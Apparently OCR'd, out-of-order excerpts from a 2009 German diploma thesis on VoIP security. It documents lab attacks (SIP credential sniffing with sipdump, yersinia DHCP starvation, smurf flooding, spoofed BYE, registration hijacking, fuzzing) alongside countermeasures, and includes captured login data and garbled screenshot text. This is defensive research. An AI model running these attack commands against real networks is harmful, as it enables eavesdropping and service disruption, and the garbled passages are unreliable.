44. Aufruf Tool mit Administratorenrechten i eth0 Besagt ber welche Schnittestelle des PC s die Daten gesnifft werden sollen logins dump Ausgabeverzeichnis im Root der ersnifften MD5 Hashwerte Untenstehender Printscreen zeigt den Aufruf des Tools mit den entsprechenden Argumenten Zu dieser Zeit der Diplomarbeit war die Existenz von BackTrack3 noch nicht bekannt steran stelafmgesktop Datei Bearbeiten Ansicht Terminal Beiter Hilfe stefan stefan desktop sudo sipdump i ethO logins dump sudo password for stefan SIPdump 0 2 MaJoMu www codito de Using dev ethd for sniffing Starting to sniff with packet filter tcp or udp Gesniffte SIP Registrierungsvorg nge werden laufend im offenen Terminalfenster aufgelistet und im Ausgabeverzeichnis logins dump aktualisiert STETaAn OStetan geskiop Datei Bearbeiten Ansicht Terminal Reiter Hilfe stefan stefan desktop sudo sipdump i eth logins dump sudo password for stefan SIPdump 0 2 MaJoMu www codito de Using dev eth for sniffing Starting to sniff with packet filter tcp or udp Dumped login from 18 1 1 181 gt 18 1 1 151 User 4119 Dumped login from 19 1 1 191 gt 18 1 1 151 User 4119 Dumped login from 19 1 1 191 gt 10 1 1 151 User 4119 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 50 oo Berner Fachhochschule ee Technik und Informatik Software Schule Schwe
45. Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz IAX Miniheader F Source Call Number Timestamp Data Quelle Bild http www en voipforo com IAX IAX frames php Bedeutung der Felder des AX Miniheaders Siehe oben Bedeutung der Felder des AX Fullheaders 3 1 2 _Exemplarischer IAX IAX2 Verbindungsaufbau und Verbindungszust nde ATERMINAL B TERMINAL SETUP RINGING AUDIO TEARDOWN Quelle Bild http www en voipforo com IAX IAX example messages php Beschreibung exemplarischer Verbindungsaufbau mit IX A IAX2 A initiiert den Anruf und sendet eine NEW Nachricht zu B B antwortet mit einer ACK Nachricht worauf A diese Nachricht auch mittels einer ACK Nachricht an B r ckbest tigt B beginnt zu rufen und teilt dies mit einer RINGING Nachricht A mit A best tigt wiederum den Erhalt der Nachricht mit ACK B beantwortet den Anruf und sendet eine ANSWER Nachricht zu A welcher diese wiederum mittels ACK r ckbest tigt Nutzdaten Transport Nach erfolgreichem Verbindungsaufbau wird der Nutzdaten Transport ber den effizienten 4 Byte grossen Miniheader ausgef hrt Periodisch werden IAX Fullheader bertragen um die Datenflusssteuerung und die Synchronisation bewerkstelligen zu k nnen Die Nutzdaten werden ber dasselbe Port ausgetauscht wie zuvor die Signalisierung Verbindungsabbau Der Verbindungsabbau wird durch das Senden
46. Broadcast Adresse nutzt also das ganze Potential s mtlicher Hosts im Netzwerk und ist dadurch sehr effektiv Vielfach werden aber genau deswegen die Hosts im Netzwerk so konfiguriert dass sie nicht auf PING s welche via Boradcast Adresse kommen antworten Auch k nnen die Router in Netzwerk so konfiguriert werden dass sie die ICMP PING Echo Requests nicht weiterleiten wenn diese an eine Broadcast Adresse gerichtet sind Sollten diese zwei Sicherheitsmassnahmen im Netzwerk des Angriffszieles vorhanden sein kann sich der Angreifer immer noch eine grosse Liste mit IP Adressen welche im Netzwerk vorkommen zusammenstellen und f r den Angriff somit gleichwohl das Potential aller Hosts nutzen 6 6 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer beabsichtigt den Gateway anzugreifen Bei erfolgreichem Angriff sind somit weder Internet noch VOIP Verbindungen nach extern und von aussen nach innen m glich Dazu muss der Angreifer die ICMP Echo Request s mit gespoofter Source IP Adresse des Gateways senden Bemerkung Obschon smurf c nicht in BackTrack3 enthalten ist wird es aus dem Terminalfenster von BackTrack3 heraus gestartet Smurf c wurde zuvor nach Back Track3 herunter geladen entpackt und kompiliert BackTrack3 bietet eine Menge vorinstallierter Pakete und Hilfsprogramme die f r viele Angriffe zwingend n tig sind Somit bietet BackTrack3 eine vorinstallierte Basis f r weitere linuxbasierte Angriff Tools welche
47. DHCP Server in Netzwerk keine freien IP Adressen mehr hat und somit auch keine vergeben kann Die darin mitgegebene IP Adresse des Default Gateways ist gef lscht und zeigt auf den selbsteingebrachten Gateway des Angreifers Dadurch werden alle Datenstr me ber den Gateway des Angreifers gelenkt der dabei die Daten mittels Netzwerkmonitor aufzeichnet und somit in Kenntnis des Kommunikations Inhaltes kommt 6 10 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer gr bt mit dem Tool yersinia s mtliche verf gbaren IP Adressen im Netzwerk ab Danach stellt es seinen eigenen DHCP Server ins Netzwerk Im Terminalfenster von BackTrack 3 wird yersinia gestartet und der Angriff mit folgenden Argumenten ausgef hrt yersinia dhcp interface ethO attack O1 Die Werte im Einzelnen stehen wie folgt f r yersinia Aufruf Programm dhcp Yersinia im Modus DHCP ausf hren interface ethO Besagt tiber welche Schnittestelle des PC s die Daten gesendet werden sollen attack O1 Attacke DHCP Starvation soll ausgef hrt werden Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 169 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Shell Yersinia lt 2 gt for nowadays networks aU U U O00 oo U ge yersinia dhcp h M attack id source arg dest arg ipsource arg ipdest arg sport arg dport arg opcode arg htype arg hlen arg hops a
48. Event L I Refer To l Content Leng 0 E Use SDP L rSDP message v 0 o user 29739 7272939 IN IP4 192 168 1 2 s rm ma 107 168 1 9 Source Port Packets to Send Message Generation Progress 5060 ia Ei ne 7 Randomize Source Port Parallel aufgezeichnet mit Wireshark w hrend dem Senden des gespooften Register Requests die gehijackte SIP Registrierung mit den falschen Contact Informationen Wi RegHijacking fakedRegister pcap Wireshark File Edit View Go Capture Analyze Statistics Help Biter sip T Depressions Clear Apply Info Request Destination Protocol 10 1 1 101 REGISTER 51p 10 1 1 101 19 10 Frame 19 476 bytes on wire 476 bytes captured Ethernet II Src CompalIn_Ob ad 96 00 1e ec 0b ad 96 Dst Dell_f0 22 43 00 14 22 f0 22 43 Internet Protocol Src 10 1 1 241 10 1 1 241 Dst 10 1 1 101 10 1 1 101 User Datagram Protocol Src Port sip 5060 Dst Port sip 5060 Request Line REGISTER sip 10 1 1 101 SIP 2 0 via SIP 2 0 UDP 10 1 1 151 18262 branch z9hG4bkK d87 54z b77ba47e29442e71 1 d8754z From bob lt sip 4119 10 1 1 101 gt tag 5e29673d To bob lt sip 4119 10 1 1 101 gt Call ID NmRHNGZiZmFMNDViNMEXMTI4Y2Nj YTKOMDA4 Yj IhYTI CSeq 1 REGISTER Contact lt sip 4115 10 1 1 241 gt 888 User Agent X Lite release 11001 stamp
49. F r DoS Angriffe flutet Netz mit Sprachpaketen vnak VOIP Network Tool Kit fiir verschiedene Protokolle VSAP VOIP Security Audit Programm Wireshark Netzwerkanalyse Paketanalysator 4 Projektmanagement 4 1 Projektorganisation Aufgrund dessen das sich die operationelle Ausf hrung dieser Diplomarbeit nur auf einen Diplomanden beschr nkt Kann auf eine Projektorganisation verzichtet werden Die beteiligten Personen an diesem Projekt sind Diplomand Name Vorname Sch r Stefan Betreuer Name Vorname J rmann Kurt Experte Name Vorname Engel Mathias Diplomarbeit VOIP Security Adresse B ndering 8 3312 Fraubrunnen Adresse Aastra Telecom Schweiz AG Ziegelmattstrasse 1 4500 Solothurn Adresse Cassarius AG Steigerhubelstrasse 3 3008 Bern 19 02 2009 Telefon 41 31 767 88 11 Telefon 41 32 655 31 97 Telefon 41 31 384 05 14 E Mail sschaer aastra com E Mail kjaermann aastra com E Mail mathias engel cassarius ch S Sch r MAS 06 02 20 Seite 217 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 4 2 Projektstruktur Da es sich bei diesem Projekt nicht um eine klassische SW Entwicklungsarbeit handelt kann diese auch nicht nach den bekannten Projektphasen Analyse Grobdesign Detaildesign Implementierung und Test erstellt werden Die Projektphasen werden daher wie folgt definiert Projektphase Inhalt Resultat Anteil Projekt Start
50. H 235 ist das Sicherheitsprotokoll von H 323 dies ist in neun Substandards unterteilt die wichtigsten werden nachfolgend kurz erw hnt H 235 1 Baseline Security Profile bietet grundlegende Sicherheitsmassnahmen um eine H 323 Verbindung abzusichern Dazu wird symmetrische Verschl sselung mittels eines Pre Shared Keys eingesetzt F r gr ssere VOIP Umgebungen ist dieses Protokoll jedoch infolge des Schl ssel Handlings zu aufw ndig und findet dort deswegen nur sehr selten Anwendung H 235 2 Signature Security Profile arbeitet mittels asymmetrischer Kryptografie Der Schl sselaustausch wird per Diffie Hellmann Verfahren gemacht als Hash Verfahren kommen SHA 1 oder MD5 zum Einsatz Dieses Protokoll sichert die Signalisierung einer H 323 Verbindung ab und gew hrleistet Integrit t Authentifizierung und Nichtabstreitbarkeit dank der Verwendung von Zertifikaten Da f r jede Nachricht eine neue digitale Signatur erzeugt werden muss ist dieses Protokoll zu wenig leistungsf hig und wird in der End zu End Kommunikation nicht eingesetzt H 235 3 Hybrid Security Profile ist eine Kombination aus H 235 1 und H 235 2 und wird verwendet um den VOIP Datenverkehr abzusichern Das Ressourcenproblem ist durch den Einsatz des symmetrischen Verfahrens weitgehend eliminiert H 235 4 setzt voraus dass jeder Endpoint bereits ber H 235 1 oder H 235 eine sichere Verbindung zum Gatekeeper aufgebaut hat Mittels eines Ticket Verfahrens Kerberos wird
51. Hijacking gibt es in verschiedenen Varianten blicherweise ist es das Ziel die SIP Registration eines anderen User Agents zu hijacken so dass alle einkommenden und abgehenden Verbindungen auf dem Terminal des Attackers einlaufen respektive gef hrt werden k nnen und der urspr ngliche User Agent der gehijackte nicht mehr erreichbar ist Weitere Varianten des Hijacken sind Hijacking eines User Agents zu einer ung ltigen Destination gt DoS Denial of Service Anrufe des Angriffszieles parallel auf dem Terminal des Angreifers rufen lassen Alle ankommenden Anrufe in der Firma auf einen einzigen User Agent umleiten Schutz gegen Angriff Analyse Zeit des automatischen Registrierungs Intervalls verk rzen Terminals haben meist einen Standardwert von 3600 Sekunden Das heisst das gehijackte Terminal meldet sich nach Ablauf dieser Zeit wieder automatisch am Registrar an Bis dahin bleibt das Terminal jeweils ankommend unerreichbar TCP f r die SIP Verbindungen verwenden Somit ist eine verbindungsorientierte Kommunikation zum SIP Proxy gegeben in welcher die Pakete durch Sequenznummern gekennzeichnet sind Ein Hijacken einer solchen Verbindung ist um ein vielfaches erschwerter als eine mit UDP Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen TLS und SIP Kapitel 8 1 4 Siehe Massnahmen IPSec und SIP Kapitel 8 1 5 Kommentar Mit diesem Tool wird eine weitere Variante von Registration Hijacking vor
52. Large 415 Unsupported Media Type 420 Bad Extension 480 Temporarily Not Available Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 29 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 481 Call Leg Transaction Does Not Exist 482 Loop Detected 483 Too Many Hops 484 Address Incomplete 485 Ambiguous 486 Busy Here 5xx Responses Server Failure Responses 500 Internal Server Error 501 Not Implemented 502 Bad Gateway 503 Service Unavailable 504 Gateway Time out 505 SIP Version Not Supported 6xx Responses Global Failure Responses 600 Busy Everywhere 603 Decline 604 Does Not Exist Anywhere 606 Not Acceptable Um zu verdeutlichen wie die SIP Nachrichten und deren Responses zwischen den User Agents Registrars SIP Proxy Servern und Redirect Servern ausgetauscht werden ist untenstehend ein exemplarischer Verbindungsaufbau mit den dazugeh rigen Erl uterungen aufgef hrt 2 1 5 Exemplarischer Verbindungsaufbau in SIP User A Proxy UserB INVITE TRIYING 100 Quelle Bild http www en voipforo com SIP SIP_example php User Agent A sendet eine INVITE Nachricht an den SIP Proxy welcher diese zu B weiterleitet und mit TRYING 100 dem User Agent A best tigt Ist User Agent B erreichbar beginnt dieser zu klingeln und sendet als Best tigung RING 180 an den SIP Proxy welcher diese Best tigung an User Agent A weiterleitet Mit dem Abnehmen des H rers sendet
53. MAS 06 02 20 sschaer aastra com Experte Mathias Engel mathias engel cassarius ch Betreuer Kurt J rmann kjaermann aastra ch Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 207 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz Dokumenteninformation Projekt VOIP Security Diplomarbeit Ablageort C Users stefan Diplomarbeit VoipSec Pflichtenheft Versionskontrolle Version Datum Beschreibung Name oder Rolle 0 1 19 10 2008 Dokument erstellt Stefan Sch r 0 2 08 11 2008 Projektphasen angepasst Stefan Sch r 1 0 25 11 2008 Kann und Sollziele neu berarbeitet Stefan Sch r Zeitplan eingef gt Pflichtenheft besprochen mit Experte Freigabe Pr fstelle Datum Visum Mathias Engel 25 11 2008 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 208 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz Inhaltsverzeichnis Einlesen asien Fehler Textmarke nicht definiert 1 1 Ausgangslage und Umfeld een Fehler Textmarke nicht definiert 1 2 Zweck des Pflichtenhefles a ses Fehler Textmarke nicht definiert 1 3 Zieleruppe a anna Fehler Textmarke nicht definiert 1 4 Definitionen und Abk rzungen nennen Fehler Textmarke nicht definiert 1o Referenzen erone a a e a aa Fehler Textmarke nicht definiert 2 Ziele und Anforderungen a eh ouside Sheena Fehler Textmarke nicht definiert 2 1 Ziele u
54. MAS 06 02 20 Seite 67 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 11 1 Denial of Service BYE Message Integritat ieee RE Vertraulichkeit Eingesetztes Tool Verf gbarkeit x SiVuS Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer http www vopsecurity org Hinweise zu Installation Verfiigbarkeit Installation Tool 3 Anwendung Tool 3 SiVus ist nur unter Windows lauff hig Erforderliche Vorkenntnisse 4 Die Installation ist einfach und meniigefihrt SiVus verf gt ber eine ausf hrliche Bedienungsanleitung mit einigen Beispielen zu dessen Einsatz Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Es sollen zwei miteinander kommunizierende User Agents durch das Senden einer gespooften BYE Nachricht getrennt werden Dieser Angriff zielt auf die Verf gbarkeit DoS Denial of Service der Gespr chskan le ab und kann gegen alle im Netz zur Zeit laufenden Gespr che ausgef hrt werden Die Gespr chsverbindung zwischen dem Angriffsziel und seinem Gespr chspartner wird getrennt Dies verunsichert die betroffenen User Agents Wenn der Angreifer es schafft das Netzwerk direkt vor dem SIP Proxy Server abzuhorchen hat er mit diesem Angriff die Herrschaft ber
55. MAS 06 02 20 Seite 76 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 13 1 Denial of Service with Fuzzing SIP Integrit t Vertraulichkeit Eingesetztes Tool Verf gbarkeit x Protos Test Suite c07 sip Downloadlink Quelle des Tools Schweregrad http www ee oulu fi research ouspg protos testing c07 sip 1 leicht 6 schwer Das Tool ist ebenfalls in BackTrack3 enthalten Hinweise zu Installation Verfiigbarkeit Installation Tool 4 Anwendung Tool 4 Das Tool ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 4 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Fuzzen ist ein Stabilit tstest Dabei wird das Angriffsziel mit m glichst vielen malgeformten IP Paketen innert k rzester Zeit bombardiert Der Angreifer versucht auf diese Weise ein System in einen unstabilen Zustand oder g nzlich zum Absturz zu bringen Schutz gegen Angriff Analyse Nicht verwenden der Well Kown Ports 5060 von SIP Da jedoch die Ports in Klartext bertragen werden und mit jedem Netzwerkmonitor aufgezeichnet werden k nnen ist dies nur ein bedingter Schutz Switches mit DoS Detektoren verwenden welche solche Angriffe
56. Redirect Die Systeme k nnen so konfiguriert werden dass ICMP Redirect Meldungen nicht akzeptiert und somit nicht ausgef hrt werden Entsprechende Eintr ge sind in der Registry der Systeme vorzunehmen Ebenfalls k nnen in Routern entsprechende ICMP Filter konfiguriert werden welche zum Beispiel ICMP Redirect Nachrichten nicht an die Hosts weiterleiten 8 5 9 Massnahmen gegen IRDP Spoofing Durch den Einsatz separater VLAN s kann dieser Angriff einged mmt werden Da keine Authentifizierung der IRDP Nachrichten statt findet gibt es keinen gezielten Schutz gegen diese Nachricht selbst IRDP sollte deshalb im ganzen Netzwerk deaktiviert werden Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 192 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 8 5 10 Massnahmen gegen Route Injection Pakete wie OSPF und RIP2 sorgen in Routern daf r dass die Routen entsprechend ge ndert werden Es muss verhindert werden dass der Angreifer solche gespoofte Pakete in das Netzwerk schleusen kann Mittels Zugriffslisten die Sender und Empf ngeradressen von Routingpaketen pr fen und auch durch gehashte Passw rter in Router Nachbarschaftsbeziehungen wird diesem Angriff entgegengewirkt Zugriffslisten sollten bei allen Ports angewendet werden wo keine Routingpakete gesendet werden d rfen 8 5 11 Massnahmen gegen PING Flood Paketfilter der Firewalls bieten gegen diesen Angriff nur bedingt Schutz
57. Sch r MAS 06 02 20 Seite 11 oo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz Folgende Attacken sind auf untenstehenden Netzwerkebenen durchzuf hren Layer 2 Attacken im Netzwerk ARP Spoofing MAC Spoofing MAC Flooding STP Attacken VLAN Angriffe Layer 3 Attacken im Netzwerk PING Flood IP Spoofing ICMP Redirect Route Injection IRDP Spoofing DHCP Starvation DHCP Rouge Server Layer 4 Attacken im Netzwerk SYN Flood LAND Flood Als weitere Hauptaufgabe soll aus den Erkenntnissen der oben geforderten Analysen und Angriffe gegen Signalisierungs und Medientransportprotokolle sowie Netzwerkinfrastruktur gezielt die Sicherheit der PBX Ascotel Intelligate der Firma Aastra Telecom Schweiz AG analysiert und angegriffen werden Es soll untersucht werden ob und in welchem Ausmass die PBX Ascotel im Bezug auf Sicherheit und Verf gbarkeit verwundbar ist Die gewonnen Erkenntnisse und aufgezeichneten Logs sind ebenfalls zu dokumentieren Die Angriffe sind gegen folgende Komponenten und Verbindungen zu t tigen Verbindungen ber die VOIP Apparate der Serie 60 70 80 IP Verbindungen ber die SIP Apparate der Serie 51 53 57 IP Verbindungen abgehend ankommend ber Softphone 2380 IP Verbindungen abgehend ankommend via MediaSwitch Verf gbarkeit amp Angriffssicherheit Ethernetschnittstelle MediaSwitch Alle zu t tigenden Analysen und Angriffe sind innerhalb der eigenen Netzwerkinfras
58. Security 19 02 2009 S Sch r MAS 06 02 20 Seite 166 eee Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Die ICMP Redirect Nachricht erzeugt zwei Eintr ge in der Hosttabelle des Angriffsziels Untenstehend ist die Hosttabelle vom Asterisk Proxy Server 10 1 1 101 zu sehen In dessen Hosttabelle wurde neu eine Defaultroute mit Anzahl 1 h chste Priorit t eingef gt Auch der Standardgateway wurde neu auf 10 1 1 240 gesetzt Alle Datenpakete die ins Internet geroutet werden m ssen werden neu ber den Gateway des Angreifers mit der IP Adresse 10 1 1 240 geroutet statt ber den bisherigen Gateway 10 1 1 1 Der Angreifer zeichnet mittels Netzwerkmonitor den gesamten Datenverkehr auf kommt so zu Informationen welche nicht f r ihn gedacht sind MS TCP Loopback interface 88 58 56 cB UMware Virtual Ethernet Adapter for UMnet8 88 58 56 cB UMware Virtual Ethernet Adapter for UMneti O 4 22 6 Broadcom 446x 167166 Integrated Controller P Bluetooth Ger t CPAN Aktive Routen Netzwer p x NNNNNGOSONNNNNNGORVEORH POO NN a et p Job fk fo ak ff fh 6 fo fd fod Y G 5 k pak mn fi fk ft a Job fh fok fk fk pak fk 6 k fh fo EY E 6 ek pak FD Pd pak fak HEW Na NNSSSONNNHLESSSSSHSH HHGSSONMNUNERKOOOSeoOH pause Parad fo fh fh fo pak fh 5 fd fh fd 6 0 GS bab pak ald fah pak pak eat ee peh pah puh pak pak PP pak foak GE GES PP Pl fi pak fak aast YY WYO AO
59. Starten von Wireshark muss zuerst die gew nschte Netzwerkschnittstelle ausgew hlt werden mit welcher die Daten aufgezeichnet werden sollen gt gt Capture gt gt Interfaces The Wireshark Network Analyzer nn Bw er u l Eile Edit View Go Ea Analyze s Help amp Options Ctrl K Start g Stop Ctrl E Restart amp Capture Filters Die Netzwerkkarte die mit dem Netzwerk verbunden ist wird ausgew hlt HB Wireshark Capture Interfaces Be a Description IP Packets Packets s Stop B Microsoft 1011114 100 22 WW Microsoft 0 0 0 0 0 0 We MS Tunnel Interface Driver unknown G 0 WW VMware Virtual Ethernet Adapter 192 168 142 1 wl VMware Virtual Ethernet Adapter 192 168 254 1 Help Wichtig ist dass der Promiscuous Mode nicht ausgeschaltet wird denn sonst werden nur Daten aufgezeichnet welche direkt an den PC MAC Adresse adressiert sind Die Argumente sind mit Start zu best tigen Wireshark zeichnet ab diesem Zeitpunkt s mtliche Pakete welche ber das Netzwerk transportiert werden auf 4 Wireshark Capture Options StS Is Capture Interface Broadcom NetXtreme Gigabit Ethernet Driver Device NPF_ BE0913C0 67D3 4228 8762 77A2532F62A0 IP address 10 1 1 241 Link layer headertype Ethernet Buffer size 1 megabyte s Wireless Settings I Capture packets in promiscuous mode E Limit each packet to 68 bytes Capture Filter ix Capture F
60. Transport ber UDP f r Audio und Videodaten in Netzwerken eingesetzt UDP ist eine nicht gesicherte Verbindung das heisst es gibt keine Kontrolle ob alle Pakete beim Empf nger ankommen Wenn einzelne RTP Pakete nicht beim Empf nger ankommen so ist dies nicht weiter st rend denn der Datenanteil eines einzelnen Paketes ist relativ gering Fehlen jedoch gr ssere Mengen der Pakete so wird dies zum Beispiel in einem VOIP Gespr ch als st rend empfunden Auch kann es sein dass die Pakete in einer falschen Reihenfolge beim Empf nger eintreffen Der Grund daf r ist dass die Pakete ber verschiedene Routen zum Empf nger gesendet werden k nnen es m ssen also nicht alle Pakete dieselbe Route zum Ziel haben RTP Pakete ber gesicherte TCP Verbindungen zu senden w rde nicht viel Sinn machen Da zum Beispiel VOIP Gespr che und Video Streams Echtzeitanwendungen sind kann nicht auf fehlende Pakete gewartet werden Dies h tte eine Verz gerung des ganzen Medienstromes zur Folge und w re unerw nscht Auch macht es keinen Sinn fehlende Pakete beim Sender nochmals anzufordern es kann keine Wiederholung des ganzen Medienstromes gemacht werden um darin das fehlende Paket in der richtigen Reihenfolge einzuschleusen Daher wurde beim RTP Protokoll bewusst UDP als Transportmittel gew hlt ber einen Zeitstempel in Header des RTP Paketes wird die Synchronisation sichergestellt Zu sp t eintreffende Pakete werden verworfen 5 1 1 RTP Header
61. Unix lauff hig und nicht in BackTrack3 enthalten Erforderliche Vorkenntnisse 5 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Der Angriff zielt auf die Verf gbarkeit der IAX Clients ab Das Netzwerk wird nach Registration Requests REGREQ der IAX Clients abgehorcht Detektiert das Tool einen Registration Request REGREQ sendet es umgehend eine gespoofte Registration Reject REGREJ Nachricht an den IAX Client zur ck und teilt ihm dadurch mit dass seine Registrierung abgelehnt wurde Ohne Registrierung kann der IAX Client weder Anrufe bekommen noch abgehend f hren Dieser Angriff kann nicht nur gegen einen einzelnen IAX Client gef hrt werden Das Tool kann auch so konfiguriert werden dass auf s mtliche Registration Requests REGREQ reagiert werden soll Schutz gegen Angriff Analyse Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Dieser Angriff hat infolge eines zu wenig performanten Angriffs PC s nicht zum Erfolg gef hrt Die Registration Reject REGREJ Pakete kamen jeweils nach dem Eintreffen der Registration Authentification REGAUTH beim IAX Client an Massgebend dabei war auch dass vnak dazu noch auf einer virtuellen Maschine gestartet wurde und der Asterisk Proxy Server im Leerlauf keine anderen Clients am Telefonieren war Der Vollst ndigkeit wegen wird dieser Angriff hier trotzdem aufgef hrt 3
62. User Agent B ein OK200 an den SIP Proxy der diese Nachricht wiederum zu User Agent A weiterleitet User Agent A best tigt den Erhalt der vorherigen Nachricht und sendet via SIP Proxy ein ACK zu User Agent B Die Verbindung steht und es kann der Austausch der Nutzdaten RTP Pakete stattfinden Wenn User Agent A das Gespr ch beendet sendet er via SIP Proxy dem User Agent B eine BYE Nachricht welcher den Erhalt mittels ACK zur ck an User Agent A best tigt B ist somit ber das Ende des Gespr ches informiert und baut ebenfalls die Verbindung ab Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 30 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 2 1 6 Exemplarischer Registrierungsablauf eines User Agents in SIP Ein User Agent sendet dem SIP Registrar eine Register Nachricht um sich bei diesem zu registrieren Der Registrar sendet dem User Agent infolge erforderlicher Authentifizierung eine 407 Proxy Authentication Required Nachricht zur ck Mit dieser Nachricht wird dem User Agent ebenfalls ein Nonce gesendet mit welchem der User Agent einen MD5 Hashwert bildet um die Registrierungsdaten nicht als Klartextnachricht tiber das Netzwerk zu senden Die erfolgreiche Registrierung wird vom SIP Proxy zurtick an den User Agent best tigt User Agent Registrar REGISTER w o credentials REGISTER w credentials Quelle Bild http www informatik
63. User Datagram Protocol Src Port iax 4569 Dst Port iax 4569 5 Inter Asterisk exchange v2 E Packet type Full packet 1 000 0000 0000 0001 Source call 1 001 0001 1100 1011 Destination call 4555 O 2 see ee Retransmission False Timestamp 3 Outbound seq no 0 Inbound seq no 1 Type IAX 6 IAX subclass REGAUTH 14 Information Element Authentication method s 0x0001 Information Element Username peer or user for authentication 4131 In Paket Nr 41 sendet der IAX Client 4131 die Registrierungs Daten erneut dem Asterisk Proxy Server zu diesmal jedoch in Klartext Der Angreifer hat sein Ziel erreicht und ist somit im Besitz der Registrierungsdaten des IAX Clients 4131 File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info 33 13 494384 vmware_ gt gt a0 D4 broaacast ARP wno Nas 1U 1 1 1517 Tell 1LU 1 1 111 36 13 494540 Intelcor_07 f3 50 vmware_55 dd b4 ARP 10 1 1 151 is at 00 1C c0 07 f3 IE id Username peer or user for authentication 0x06 Length 4 Username peer or user for authentication 4131 B Information Element when to refresh registration 300 IE id when to refresh registration 0x13 Length 2 when to refresh registration 300 5 Information Element MDS challenge result 3ascotel IE id MDS challenge result 0x10 Length 8 MD5 challenge result 3ascotel Ih Diplo
64. Verhalten des Ger tes w hrend Flooding Weder ankommende noch abgehende Gespr che sind m glich Applikation st rzt ab blockiert Verhalten des Ger tes nach dem Flooding Applikation muss im Taskmanager beendet werden ist blockiert Untenstehender Printscreen zeigt das blockierte Softphone X Lite des Users Agents 4119 w hrend und nach dem Angriff 5 verknupfung me Benutzername LE Speicher Admirestrator 236 460 K SYSTEM 56K Administrator 7 984 K Administrator 4 844 K Administrator 204K SYSTEM 436K NETZWERKDIENST 548K Administrator 200K Administrator 200K Administrator 200K Administrator 1 540 K Administrator 464K Administrator 200 K Administrator 200 K Administrator 200K LOKALER DIENST 4 812K SYSTEM 4 216K NETZWERKDIENST NETZWERKDIENST I Bl Ns i 8888888888838888822 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 74 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Obige Angriffe zielten direkt auf einzelne Terminals bestimmter User Agents ab Ein INVITE Flood Angriff kann jedoch auch gegen einen SIP Proxy Server gerichtet sein Da dieser Angriff gegen das Herz der Kommunikationsl sung gemacht wird ist er auch dementsprechend effektiv Die Menge der INVITE Meldungen die den SIP Proxy Server besch ftigen erlauben es ihm nicht mehr die anderen Aufgaben wie Vermittlungsaufgaben und Verbindungsanfragen rechtzeitig abarbeiten zu k nn
65. aktuelle gebrauchte Netzwerkkarte ausgew hlt werden Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse User Agents haben sich je nach Konfiguration des Registrars entweder unauthentisiert oder authentisiert bei diesem anzumelden Ziel dieses Angriffes ist es eine Authentifizierung mitzusniffen mitschneiden um daraus dann die Registrierungsinformationen ableiten zu k nnen Die so erworbenen Informationen k nnen f r ein Registrations Hijacking verwendet werden in dem der Angreifer ein eigenes Terminal mit den gestohlenen Registrationsdaten ins Netzwerk bringt Schutz gegen Angriff Analyse Es m ssen zwingend sichere Passw rter verwendet werden Sichere Passw rter sind keine W rter die in einem Dictionary oder Duden vorkommen auch wenn diese zum Beispiel am Schluss noch mit zwei Zahlen versehen werden z Bsp Spanien08 UNSICHER Sichere Passw rter enthalten Sonderzeichen Gross und Kleinschreibung ergeben keinen Sinn und sind mindestens 8 Zeichen lang Sichere Passw rter stehen auch nicht auf einem Post it Nachrichtenzettel unter dem Telefonie Terminal oder der PC Tastatur Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Cain amp Abel ist ein sehr m chtiges Tool und kann f r viele weitere Angriffe eingesetzt werden Infolge seiner Gef hrlichkeit wird es ausnahmslos von jedem Virenscanner erkannt und l sst sich dadurc
